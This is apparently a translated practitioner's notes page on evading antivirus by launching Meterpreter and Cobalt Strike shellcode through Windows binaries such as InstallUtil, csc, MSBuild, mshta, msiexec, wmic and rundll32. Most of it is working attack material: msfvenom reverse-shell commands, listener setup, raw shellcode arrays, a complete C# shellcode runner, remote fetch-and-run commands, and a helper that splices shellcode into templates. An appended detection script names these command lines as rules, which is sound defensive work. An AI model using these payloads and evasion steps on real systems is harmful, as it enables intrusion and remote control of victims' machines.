Payload AV evasion: abusing Installutil.exe & csc.exe [reproduced OK on my own Win7 machine]
Note: the .NET Framework I downloaded is 4.8, not the latest; the latest doesn't come with the v2 csc.exe.
The C# compiler on Windows is csc.exe. InstallUtil.exe is a command-line utility that installs and uninstalls server resources by executing the installer components inside a specified assembly; it loads the assembly whatever its file extension is (.dll, .exe, .txt and so on). The two are normally used together, so they are not covered separately.
0x01 Procedure
1. Download shellcode.cs
wget https://github.com/222222amor/exp_notes/blob/master/InstallUtil-Shellcode-cs
(This is the GitHub blob page, so wget will save HTML; fetch the Raw view of the file instead.)
Here I use Cobalt Strike shellcode; you can also use msf shellcode, generated with the following command:
msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt
The one I generated myself:
byte[] buf = new byte[559] { 0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x89,0xe5,0x64,0x8b,0x52,0x30, 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x8b,0x72,0x28, 0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49, 0x75,0xef,0x52,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x57,0x01,0xd0,0x8b,0x40,0x78, 0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,0x50,0x8b,0x58,0x20,0x01,0xd3, 0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xc1, 0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24, 0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c, 0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59, 0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d, 0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26, 0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0xe8,0x75,0x00,0x00,0x00, 0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x4d,0x61, 0x63,0x69,0x6e,0x74,0x6f,0x73,0x68,0x3b,0x20,0x49,0x6e,0x74,0x65,0x6c,0x20, 0x4d,0x61,0x63,0x20,0x4f,0x53,0x20,0x58,0x20,0x31,0x32,0x5f,0x32,0x5f,0x31, 0x29,0x20,0x41,0x70,0x70,0x6c,0x65,0x57,0x65,0x62,0x4b,0x69,0x74,0x2f,0x36, 0x30,0x35,0x2e,0x31,0x2e,0x31,0x35,0x20,0x28,0x4b,0x48,0x54,0x4d,0x4c,0x2c, 0x20,0x6c,0x69,0x6b,0x65,0x20,0x47,0x65,0x63,0x6b,0x6f,0x29,0x20,0x56,0x65, 0x72,0x73,0x69,0x6f,0x6e,0x2f,0x31,0x35,0x2e,0x32,0x20,0x53,0x61,0x66,0x61, 0x72,0x69,0x2f,0x36,0x30,0x35,0x2e,0x31,0x2e,0x31,0x35,0x00,0x68,0x3a,0x56, 0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0x5c,0x11,0x00,0x00, 0xe8,0xcf,0x00,0x00,0x00,0x2f,0x71,0x30,0x53,0x7a,0x48,0x50,0x38,0x6b,0x57, 0x41,0x6c,0x32,0x6c,0x58,0x65,0x55,0x46,0x62,0x55,0x35,0x70,0x41,0x47,0x6c, 0x75,0x76,0x52,0x36,0x4f,0x68,0x2d,0x64,0x53,0x39,0x65,0x6d,0x6b,0x58,0x63, 0x61,0x4d,0x4d,0x68,0x32,0x73,0x41,0x79,0x76,0x76,0x78,0x61,0x58,0x57,0x36, 
0x5f,0x50,0x4e,0x48,0x62,0x6d,0x44,0x66,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6, 0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,0x32,0xe8,0x84,0x53,0x53,0x53,0x57,0x53, 0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0x0a,0x5f,0x68,0x80,0x33, 0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86, 0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85, 0xc0,0x75,0x14,0x68,0x88,0x13,0x00,0x00,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5, 0x4f,0x75,0xcd,0xe8,0x4c,0x00,0x00,0x00,0x6a,0x40,0x68,0x00,0x10,0x00,0x00, 0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53, 0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89, 0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5, 0x58,0xc3,0x5f,0xe8,0x6b,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38, 0x2e,0x31,0x35,0x37,0x2e,0x31,0x32,0x38,0x00,0xbb,0xf0,0xb5,0xa2,0x56,0x6a, 0x00,0x53,0xff,0xd5 };
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST xx.xxx.xxx.xxx
set LPORT 443
set ExitOnSession false
run -j
Note: the handler payload must match what was generated. The reverse_https shellcode from the msfvenom line above needs windows/meterpreter/reverse_https here, and a Cobalt Strike payload is caught by its own CS listener, not by msf.
2. Compile and execute ==> had problems, needs other source downloaded to go with it, see below!!!
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe InstallUtil-ShellCode.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
or, 64-bit:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Bitness has to line up end to end: an x86 shellcode needs /platform:x86 and the InstallUtil.exe under Framework\, an x64 shellcode needs /platform:x64 and the one under Framework64\, otherwise the assembly fails to load or the thread crashes.
[Figure: bypass flow diagram]
But reality is harsh: it was already killed by a certain 360.
Or, alternatively, you got past it.
Supplement:
https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji
csc /target:exe test.cs
Compiles test.cs into a console application named test.exe.
AV evasion study: using MSBuild to execute the payload
What is MSBuild
MSBuild is the build system used by Microsoft and Visual Studio; put simply, it is what compiles your project, the so-called build engine. MSBuild can build .NET project files on a machine without Visual Studio installed, and it accepts project files in a specific XML format. In short, MSBuild can compile and run C# code: the template used below is an inline task, C# embedded in the project XML that MSBuild compiles and executes inside MSBuild.exe itself when the project is built. Inline tasks only exist from the .NET 4.0 toolset onward, so the v4.0.30319 paths below are a requirement, not just an example.
Location
Loading 32-bit shellcode needs the 32-bit MSBuild:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Loading 64-bit shellcode needs the 64-bit MSBuild:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Generate the shellcode and execute it
Here we use msf to generate 64-bit shellcode (I have no 32-bit machine, awkward QAQ):
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 -f csharp
Use someone else's template:
https://github.com/3gstudent/msbuild-inline-task.git
Use the template "executes x64 shellcode.xml" (my machine is 64-bit) and replace the shellcode on line 45 with the msf-generated shellcode (mind the variable name: msfvenom calls the array buf, the template has its own name, and the declared array length must equal the number of bytes).
Set msf to listen:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.1.130
set LPORT 4444
set ExitOnSession false
set autorunscript migrate -n explorer.exe
exploit -j
Then run on the target machine:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319>MSBuild.exe "C:\Users\jack.0DAY\Desktop\exec.xml"
Afterword: Win10 has memory protection and does not allow writing the shellcode in. My Win7 and Win2008 do not have the v4.0.30319 directory; the other directories also contain an MSBuild, but it cannot be used and the build errors out. Not successful yet.
Using installutil.exe and csc.exe [practice OK]
What is installutil
The Installer tool is a command-line utility that installs and uninstalls server resources by executing the installer components in a specified assembly. It works with the classes in the System.Configuration.Install namespace (a .NET namespace, so the installer class can be written in C# as below).
Generate shellcode with msf
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 -f csharp
Download someone else's InstallUtil-shellcode .cs file and replace the shellcode in it with ours.
After replacement:
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe Shellcode.cs

Step Two:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
(Or)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

The gist of this one is we can exhibit one behaviour if the application is launched via normal method, Main().
Yet, when the Assembly is launched via InstallUtil.exe, it is loaded via Reflection and circumvents many whitelist controls.

We believe the root issue here is:
The root issue here with Assembly.Load() is that at the point at which execute operations are detected
(CreateFileMapping->NtCreateSection), only read-only access to the section is requested, so it is not processed
as an execute operation. Later, execute access is requested in the file mapping (MapViewOfFile->NtMapViewOfSection),
which results in the image being mapped as EXECUTE_WRITECOPY and subsequently allows unchecked execute access.

The concern is this technique can circumvent many security products, so I wanted to make you aware and get any feedback.
Its not really an exploit, but just a creative way to launch an exe/assembly.
*/

//root@infosec:~# msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt

public class Program
{
    public static void Main()
    {
        // This is what runs when the exe is started normally; it does nothing useful.
        Console.WriteLine("Hello From Main...I Don't Do Anything");
        //Add any behaviour here to throw off sandbox execution/analysts :)
    }
}

[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
    // InstallUtil.exe /U loads the assembly by reflection and calls this method.
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        Shellcode.Exec();
    }
}

public class Shellcode
{
    public static void Exec()
    {
        // native function's compiled code
        // generated with metasploit
        byte[] shellcode = new byte[354] {
        0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,
        0x8b,0x52,0x0c,0x8b,0x52,0x14,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x8b,0x72,0x28,
        0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
        0x75,0xef,0x52,0x8b,0x52,0x10,0x57,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,
        0x85,0xc0,0x74,0x4c,0x01,0xd0,0x50,0x8b,0x58,0x20,0x01,0xd3,0x8b,0x48,0x18,
        0x85,0xc9,0x74,0x3c,0x49,0x31,0xff,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xc1,
        0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
        0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,
        0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
        0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
        0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
        0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
        0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0x9d,0x80,0x68,0x02,
        0x00,0x30,0x39,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
        0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
        0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,
        0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
        0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
        0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
        0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,
        0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
        0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
        0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
        0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };

        // allocate RWX memory, copy the shellcode in, run it on a new thread
        UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
        IntPtr hThread = IntPtr.Zero;
        UInt32 threadId = 0;
        // prepare data
        IntPtr pinfo = IntPtr.Zero;
        // execute native code
        hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }

    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

    // UInt32 pointers: this template is 32-bit only (/platform:x86), as the Step One command shows.
    [DllImport("kernel32")]
    private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32")]
    private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

    [DllImport("kernel32")]
    private static extern bool CloseHandle(IntPtr handle);

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    [DllImport("kernel32")]
    private static extern IntPtr GetModuleHandle(string moduleName);

    [DllImport("kernel32")]
    private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    private static extern UInt32 LoadLibrary(string lpFileName);

    [DllImport("kernel32")]
    private static extern UInt32 GetLastError();
}
Compile with csc
csc is the C# compiler that ships with the .NET Framework itself, so nothing needs to be installed on the target.
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs
Note: the output file extension can be anything you like, but the file then has to be run through InstallUtil.
Execute the binary with InstallUtil
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U D:\test\InstallUtil-shell.exe

On success you get a reverse shell, but 360 intercepts it and you have to click Allow. emmmm
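Every step above that says "replace the shellcode in the .cs file" (the InstallUtil procedure in 0x01, the line-45 edit of the MSBuild inline-task template, and the InstallUtil-ShellCode.cs replacement just shown) is the same edit: paste the byte[] literal from msfvenom -f csharp into the template under the template's own variable name, with a declared length that matches the byte count. csc refuses a mismatched length and the template's Marshal.Copy references the template's name, not msfvenom's buf, so this is where hand edits usually break. The helper below, added here as an example and not part of the page or of the subTee / 3gstudent templates, parses such a literal, validates it, and splices it into a template; the byte strings and the template skeleton it runs on are constructed placeholders, not shellcode.

```python
"""Format shellcode as the C# byte[] literal the InstallUtil / MSBuild templates
expect, and validate the literal before compiling.

Added example, not from the page or its templates. Byte strings here are
constructed placeholders, not real shellcode.
"""
import re

# Matches `byte[] NAME = new byte[N] { 0x.., ... };` as emitted by msfvenom -f csharp
# and as found in the InstallUtil-ShellCode.cs / msbuild-inline-task templates.
ARRAY_RE = re.compile(
    r"byte\[\]\s+(?P<name>\w+)\s*=\s*new\s+byte\[(?P<len>\d+)\]\s*\{(?P<body>[^}]*)\}\s*;"
)


def parse_csharp_array(text: str) -> bytes:
    """Extract the bytes from a C# byte[] literal.

    Refuses the literal when the declared length and the element count differ:
    csc only compiles the array if they match, and a hand-edited template
    usually fails exactly here.
    """
    m = ARRAY_RE.search(text)
    if m is None:
        raise ValueError("no C# byte[] literal found")
    values = [int(tok, 16) for tok in re.findall(r"0x([0-9a-fA-F]{1,2})", m.group("body"))]
    declared = int(m.group("len"))
    if declared != len(values):
        raise ValueError(f"declared length {declared} but {len(values)} elements")
    return bytes(values)


def to_csharp_array(data: bytes, name: str = "buf", per_line: int = 15) -> str:
    """Render bytes in msfvenom's csharp layout: 15 values per line, lowercase 0x.."""
    hexes = [f"0x{b:02x}" for b in data]
    lines = [",".join(hexes[i:i + per_line]) for i in range(0, len(hexes), per_line)]
    return f"byte[] {name} = new byte[{len(data)}] {{\n" + ",\n".join(lines) + " };"


def splice_into_template(template: str, data: bytes) -> str:
    """Replace the byte[] literal inside a template with `data`, keeping the
    template's own variable name (shellcode, buf, ...) so the rest of the file
    (Marshal.Copy, VirtualAlloc) still compiles: the 'mind the variable name' step."""
    m = ARRAY_RE.search(template)
    if m is None:
        raise ValueError("template contains no byte[] literal to replace")
    literal = to_csharp_array(data, name=m.group("name"))
    return template[: m.start()] + literal + template[m.end():]


def convert(msfvenom_output: str, template: str) -> str:
    """End to end: validate msfvenom -f csharp text and splice it into a template."""
    return splice_into_template(template, parse_csharp_array(msfvenom_output))


if __name__ == "__main__":
    # Constructed stand-ins: a 4-byte "payload" (three NOPs and a RET) and a
    # minimal template skeleton in the shape of the page's Shellcode class.
    MSF_TEXT = "byte[] buf = new byte[4] { 0x90,0x90,0x90,0xc3 };"
    TEMPLATE = (
        "public class Shellcode {\n"
        "    public static void Exec() {\n"
        "        byte[] shellcode = new byte[2] { 0x00,0x00 };\n"
        "        // VirtualAlloc / Marshal.Copy / CreateThread as in the template above\n"
        "    }\n"
        "}\n"
    )
    print(convert(MSF_TEXT, TEMPLATE))
```

Run it with the real msfvenom output and template file contents in place of the placeholders; a ValueError on the msfvenom side means the paste was truncated (the first sample on this page, for instance, is split across two lines), and a ValueError on the template side means the regex did not find a literal to replace.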
Using regasm and regsvcs [fileless attack, todo]
Both are used the same way, and the same way as above:
- Likewise requires downloading some things (the regsvcs.cs template)
- Generate the shellcode in msf and put it into the .cs file
- Compile (with csc, but it must be compiled as a dll)
- Execute (with regasm or regsvcs)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs
(key.snk is a strong-name key pair, generated with sn.exe -k key.snk from the Windows SDK; regsvcs only registers strong-named assemblies.)
Execute
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 1.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe 1.dll
or (with /U, the uninstall/unregister path, which still runs the code):
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U 1.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U 1.dll
We don't have the signing tool sn here, so leave this for now.
Using mshta
This one is easier to use, because it is on the PATH.
- Generate shellcode with msf
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 -f raw > shellcode.bin
- base64-encode the shellcode (encoding, not encryption; it only has to fit in the .hta as text)
cat shellcode.bin | base64 -w 0
In the .hta template, replace the base64 blob wrapped above the line ' ---------- DO NOT EDIT BELOW HERE ----------- with ours.
Host it on a web server.
Run on the target: mshta.exe http://xxx/shellcode.hta
Awesome, callback straight away, 360 did not react at all!!!!
Cobalt Strike has this feature as well.
Using Msiexec
Msiexec is part of Windows Installer and is used to install Windows Installer packages (MSI). It usually appears while Microsoft Update is installing updates or while some software is being installed, uses a fair amount of memory, and ships with Windows 2003, Windows 7, etc.
Msiexec is already on the PATH.
- Generate an MSI package with msf (-f msi wraps the payload in an installer package rather than emitting raw shellcode)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 -f msi > shellcode.txt
- Run on the target machine (/q quiet, /i install from a URL; the package does not need an .msi extension)
msiexec.exe /q /i http://192.168.22.1:12345/shellcode.txt
Note: 360 blocks it, reporting an "MSI download attack".
wmic
Already on the PATH. The /FORMAT switch makes wmic fetch and apply an XSL stylesheet, and a stylesheet may carry script:
wmic os get /FORMAT:"http://example.com/evil.xsl"
PoC (pops calc):
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>
Further reading
https://3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/
Note: 360 blocks it, calling it a wmic attack.
Abusing Rundll32.exe
Rundll32.exe means "run a 32-bit DLL": it calls an exported function of a DLL from the command line (the name is historical; the copy in System32 on 64-bit Windows is itself 64-bit). It is on the PATH.
- Execute custom script (JScript through mshtml's RunHTMLApplication):
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Note: gets blocked.
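Each of the launchers above (InstallUtil /U, MSBuild with a project file, regsvcs/regasm, mshta with a URL, msiexec /i from a URL, wmic /FORMAT with a remote XSL, rundll32 javascript:) leaves a process-creation record whose command line is the most stable thing to alert on, which is also what 360 is reacting to in the notes above. The script below is an added example, not from the page: it runs a small rule set over constructed Sysmon-style (Image, CommandLine) events built from the commands on this page plus two benign decoys, and reports which rule fired. The rule names and the decoy paths are my own.

```python
"""Triage process-creation telemetry for the LOLBin patterns used on this page.

Added example, not from the page. Events are constructed, modelled on the
Image / CommandLine fields of Sysmon Event ID 1 or Security 4688; no real telemetry.
"""
import re
from typing import Dict, List, Tuple

# (rule name, image basename pattern, command-line pattern), all case-insensitive.
# Each pattern is lifted from a command on this page; treat them as a starting
# point and tune against your own build servers and installers before alerting.
RULES: List[Tuple[str, re.Pattern, re.Pattern]] = [
    # InstallUtil /U with the subTee "/logfile= /LogToConsole=false" signature
    ("installutil_uninstall_exec", re.compile(r"^installutil\.exe$", re.I),
     re.compile(r"(?:^|\s)/u(?:\s|$)|logtoconsole=false", re.I)),
    # MSBuild fed a bare .xml project, or any project under a user-writable path
    ("msbuild_inline_task_project", re.compile(r"^msbuild\.exe$", re.I),
     re.compile(r"\.xml[\"']?(?:\s|$)|\\users\\|\\temp\\", re.I)),
    # regsvcs/regasm are rare outside installers: any dll registration is worth a look
    ("regsvcs_regasm_dll", re.compile(r"^(?:regsvcs|regasm)\.exe$", re.I),
     re.compile(r"\.dll[\"']?(?:\s|$)", re.I)),
    ("mshta_remote_hta", re.compile(r"^mshta\.exe$", re.I),
     re.compile(r"https?://", re.I)),
    ("msiexec_remote_package", re.compile(r"^msiexec\.exe$", re.I),
     re.compile(r"/i\s+[\"']?https?://", re.I)),
    ("wmic_remote_xsl", re.compile(r"^wmic\.exe$", re.I),
     re.compile(r"/format:\s*[\"']?https?://", re.I)),
    ("rundll32_javascript", re.compile(r"^rundll32\.exe$", re.I),
     re.compile(r"javascript:", re.I)),
]


def image_basename(image: str) -> str:
    """Strip the directory from a Windows image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1]


def classify(image: str, command_line: str) -> List[str]:
    """Return the names of every rule that matches one process-creation event."""
    base = image_basename(image)
    return [name for name, img_re, cmd_re in RULES
            if img_re.search(base) and cmd_re.search(command_line)]


def triage(events: List[Tuple[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> matched rules, omitting events that matched nothing."""
    result: Dict[int, List[str]] = {}
    for idx, (image, cmdline) in enumerate(events):
        hits = classify(image, cmdline)
        if hits:
            result[idx] = hits
    return result


# Constructed sample events: the commands from this page plus two benign decoys.
EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe",
     r"InstallUtil.exe /logfile= /LogToConsole=false /U D:\test\InstallUtil-shell.exe"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     r'MSBuild.exe "C:\Users\jack.0DAY\Desktop\exec.xml"'),
    (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", r"regsvcs.exe /U 1.dll"),
    (r"C:\Windows\System32\mshta.exe", r"mshta.exe http://xxx/shellcode.hta"),
    (r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /q /i http://192.168.22.1:12345/shellcode.txt"),
    (r"C:\Windows\System32\wbem\WMIC.exe", r'wmic os get /FORMAT:"http://example.com/evil.xsl"'),
    (r"C:\Windows\System32\rundll32.exe",
     r'rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");'),
    # benign decoys: a local MSI install and a solution build from a build-agent path
    (r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Windows\Installer\12ab3.msi /qn"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     r'MSBuild.exe "C:\build\agent\src\App.sln" /t:Build'),
]

if __name__ == "__main__":
    for idx, hits in triage(EVENTS).items():
        print(idx, EVENTS[idx][1][:60], "->", hits)
```

The two decoys are the usual false-positive sources: msiexec installing a local package and MSBuild building a real solution from a build host. Anything that runs these binaries from user-writable paths, from Office or browser parents, or with a URL argument deserves a ticket regardless of what 360 says.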
Using a shellcode loader
Use a third-party loader to load the shellcode into memory and execute it.
- Generate shellcode with msf (raw output, despite the .c file name)
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c
Run on the target:
shellcode_launcher.exe -i test.c
The target calls back.
Note: 360 does not block it. Pretty impressive.
Using less common languages (py, go, etc.)
The benefit of an uncommon language is that the final executable is a generic runtime stub (for Python, the PyInstaller bootloader) with the payload buried in packed script data, so signatures written against the usual msfvenom PE output do not match it.
- Generate a py trojan with msf
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 -e x86/shikata_ga_nai -i 5 -f py -o shellcode.py
Note: -f py only writes the shellcode as a Python byte string (a buf variable); the .py must contain code that actually runs it before packaging, otherwise the executable does nothing.
- Package it with pyinstaller
pyinstaller -F --console shellcode.py
If you don't have it, install it with pip install pyinstaller.
There is a pitfall here: the binary only runs on the same kind of system it was built on (PyInstaller does not cross-compile, so build the Windows executable on Windows).
Double-click the generated binary and the trojan calls back.
Using Go
Haven't set up that environment yet.